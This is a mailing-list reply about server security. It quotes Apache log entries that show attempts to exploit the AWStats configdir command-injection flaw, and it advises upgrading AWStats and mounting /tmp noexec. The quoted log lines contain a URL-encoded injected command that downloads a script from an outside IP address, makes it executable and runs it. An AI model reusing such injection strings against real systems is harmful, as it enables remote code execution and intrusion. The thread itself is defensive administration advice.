Michael Mansour wrote:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
HTTP/1.1"
403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
HTTP/1.1"
404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
...
Are there any updates FL can do to any of the packages to fix/block
slapper from an FC1 machine?
You might also want to make sure you're using a current version of
AWStats. IIRC this flaw was fixed in either 6.3 or 6.4, and the current
version is 6.5.
(If you don't have awstats.pl on your system, then these lines are just
probes and aren't relevant to your problem.)
More generally, I read advice somewhere that mounting /tmp with the
"noexec" option (and making any other temp directories symbolic links to
that one) can make this type of attack much more difficult.
--
Kelson Vibber
SpeedGate Communications <www.speed.net>
--
fedora-legacy-list mailing list
fedora-legacy-list@redhat.com
https://www.redhat.com/mailman/listinfo/fedora-legacy-list
